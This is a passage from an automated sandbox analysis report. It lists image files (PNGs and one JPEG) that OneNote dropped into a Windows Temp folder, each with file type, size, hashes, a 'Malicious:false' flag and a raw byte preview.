                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{BDB35C25-65FA-4E76-934A-F0CCE8881D41}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):84097
                                                                                                                                            Entropy (8bit):7.78862495530604
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
                                                                                                                                            MD5:37EED97290E8ECB46A576C84F0810568
                                                                                                                                            SHA1:18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
                                                                                                                                            SHA-256:140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
                                                                                                                                            SHA-512:E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{BE3EFD86-388A-4F70-ADB2-2C73CD8040B0}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{BE97FEEF-B437-4B47-B08A-5A12778500DA}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13084
                                                                                                                                            Entropy (8bit):7.940058639272698
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                            MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                            SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                            SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                            SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{BF42DFA4-5D75-4141-95D9-FA4A41EAF1BA}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2210
                                                                                                                                            Entropy (8bit):7.86853667196985
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                            MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                            SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                            SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                            SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{BF6760AA-6565-4515-AF7E-BD08CAD813B3}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13030
                                                                                                                                            Entropy (8bit):7.948664903731204
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                            MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                            SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                            SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                            SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{C1999407-4C09-4BD3-8F34-3D764FC9D2D0}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{C227E9EE-7348-434A-BB3E-D32085FFA0F3}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11332
                                                                                                                                            Entropy (8bit):7.9324721568775285
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                            MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                            SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                            SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                            SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{C280D85D-1F57-45E2-ABFE-13D44D7BC473}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1657
                                                                                                                                            Entropy (8bit):7.80882577056055
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                            MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                            SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                            SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                            SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{C447C65F-197C-47BE-9A4B-B5D3A2FEBB6A}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16003
                                                                                                                                            Entropy (8bit):7.959532793770661
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                            MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                            SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                            SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                            SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{C468FDFE-538D-46EB-B153-A5CF0237410C}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4490
                                                                                                                                            Entropy (8bit):7.928016176674318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                            MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                            SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                            SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                            SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{C5BE10C3-DB70-46C7-9611-5885E9DE8FF5}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17289
                                                                                                                                            Entropy (8bit):7.962998633267186
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                            MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                            SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                            SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                            SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{C68217BC-29F5-47DE-A780-C1063AAB0167}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 40 x 623, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1569
                                                                                                                                            Entropy (8bit):7.583832946136897
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
                                                                                                                                            MD5:07DB3F43DE7C1392C67802E74707DAA6
                                                                                                                                            SHA1:C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
                                                                                                                                            SHA-256:51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
                                                                                                                                            SHA-512:E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
                                                                                                                                            Malicious:false
